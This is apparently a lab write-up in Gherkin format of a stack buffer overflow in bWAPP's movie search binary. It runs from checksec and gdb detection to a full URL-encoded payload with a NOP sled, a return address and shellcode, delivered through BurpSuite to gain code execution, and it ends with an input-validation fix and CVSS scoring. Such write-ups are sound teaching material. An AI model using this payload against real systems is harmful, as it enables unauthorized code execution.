## Version 1.4.1
## language: en

Feature: Buffer Overflow (Local)
  TOE:
    bWAPP
  Category:
    Buffer Overflow
  Location:
    http://192.168.1.119/bWAPP/bof_1.php - title (field)
  CWE:
    CWE-121: Stack-based Buffer Overflow
  Rule:
    REQ.157: https://fluidattacks.com/web/rules/157/
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Execute commands in the system
  Recommendation:
    Use protection mechanism against buffer overflows attacks

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali linux      | 4.19.0      |
    | Firefox         | 60.6.2      |
    | BurpSuite       | 1.7.36-56   |
    | Python          | 2.7         |
    | gdb             | 6.8-debian  |
  TOE information:
    Given The site
    When I enter into it
    Then I can search for a movie by its name

  Scenario: Normal use case
    Given The site
    When A user wants to search a movie
    Then He types into the title field
    And The server searches for the movie

  Scenario: Static detection
    Given The source code
    When I see that the code executes a binary file "./apps/movie_search"
    Then I use the tool "checksec.sh" from Github
    """
    https://github.com/slimm609/checksec.sh
    """
    When I run the command to analyse the file
    """
    $ ./checksec.sh --file=movie_search
    """
    Then I get the file security information
    """
    RELRO           STACK CANARY      NX            PIE
    No RELRO        No canary found   NX disabled   No PIE

    RPATH      RUNPATH      Symbols       FORTIFY Fortified  Fortifiable
    No RPATH   No RUNPATH   102 Symbols   No      0          0
    """
    And The file doesn't have protections against overflows

  Scenario: Dynamic detection
    Given The file "movie_search"
    When I open it in "gdb"
    Then I can check overflow vulnerabilities
    When I create a file "payload.txt" containing 'A' with Python
    """
    $ python -c "print 'A'*1000" > payload.txt
    """
    Then I run the file in "gdb" with the file as parameter
    """
    $ (gdb) r $( cat /home/bee/Desktop/payload.txt)
    """
    When I see the return address after reading the input
    """
    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0xb7a2b6c0 (LWP 13834)]
    0x61616161 in ?? ()
    """
    Then I have a buffer overflow vulnerability

  Scenario: Exploitation
    Given The vulnerability
    When I see the hint in the site
    Then I get the padding size that is "354"
    And The return address "\x8f\x92\x04\x08"
    When I create a Python script "bof.py" to create my payload
    Then I create a payload executing the command "ls"
    """
    $ python bof.py ls
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90
    %90%90%90%90%8f%92%04%08%31%c0%50%68%2f%2f%6c%73%68%2f%62%69%6e%89%e3%89%c1
    %89%c2%b0%0b%cd%80%31%c0%40%cd%80
    """
    When I intercept a post request with BurpSuite
    Then I can use my payload as the value of the title parameter
    When I send the request
    Then I have remote code execution in the machine [evidence](image1.png)

  Scenario: Remediation
    Given The file 'bof_1.php'
    When I add a conditional to validate the input
    """
    if(!preg_match('/^[\w-]+$/', $title)) {
       echo "Only alphanumeric values";
    }
    """
    Then I can only insert alphanumeric values
    When I try to inject my payload
    Then I can't execute it
    And The vulnerability is patched

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.1/10 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.3/10 (High) - E:F/RL:T/RC:R/CR:H/IR:H/AR:L
    Environmental: Unique and relevant attributes to a specific user environment
      7.9/10 (High) - MAV:N/MAC:L/MPR:L/MUI:N/MS:U/MC:H/MI:H/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2019-10-07
